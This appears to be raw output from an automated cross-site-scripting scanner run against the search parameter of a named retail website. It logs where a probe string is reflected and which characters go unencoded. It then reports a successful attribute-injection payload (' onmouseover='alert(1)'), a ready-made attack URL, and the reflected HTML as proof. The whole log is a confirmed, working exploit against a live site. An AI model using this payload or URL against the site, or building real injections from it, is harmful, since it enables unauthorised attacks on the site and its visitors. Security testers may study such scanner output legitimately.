https://www.idjnow.com/checkout/cart/

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.idjnow.com/nsearch/?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input id="search" type="search" name="q" value="(uvw&quot;xyz'yxz&lt;/zxy" class="input-text required-entry" maxlength="128" placeholder="Keyword Search" onfocus="this.placeholder=''" onblur="this.placeholder='Keyword Search'"/>

----------------------------------------------------------------------------------
HTML Context: [1]
<title>Search results for &quot;(uvw&quot;xyz'yxz&lt;/zxy&quot;</title>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [2]
<a href="https://www.idjnow.com/nsearch/?q=(uvw%22xyz&#39;yxz%3C/zxy&amp;PageSpeed=noscript">
<meta HTTP-EQUIV="refresh" content="0;url='https://www.idjnow.com/nsearch/?q=(uvw%22xyz&#39;yxz%3C/zxy&amp;PageSpeed=noscript'" />

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.idjnow.com/nsearch/?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input id="search" type="search" name="q" value="' onmouseover='alert(1)" class="input-text required-entry" maxlength="128" placeholder="Keyword Search" onfocus="this.placeholder=''" onblur="this.placeholder='Keyword Search'"/>
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
